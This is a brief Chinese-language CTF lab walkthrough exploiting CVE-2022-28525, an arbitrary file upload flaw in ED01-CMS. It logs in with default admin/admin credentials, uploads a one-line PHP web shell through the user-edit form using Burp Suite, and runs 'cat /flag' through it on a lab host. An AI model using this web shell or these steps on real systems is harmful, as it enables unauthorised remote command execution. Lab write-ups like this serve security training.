CVE-2022-28525 (ED01-CMS v20180505 存在任意文件上传漏洞)
1、访问url
2、尝试弱口令admin/admin登录
3、因为是任意文件上传漏洞,在各页面查找上传接口
在users/view all users 找到上传页面,
4、点击edit,进行编辑,填写password,并上传文件,使用burpsuit抓包
test.php内容如下
<?php system($_GET[cc]);?>
5、send to repeater
6、审查图片元素发现文件路径在/images/ 路径下
7、 访问http://eci-2zeeoly4mjll60mndqll.cloudeci1.ichunqiu.com/images/test.php?cc=cat%20/flag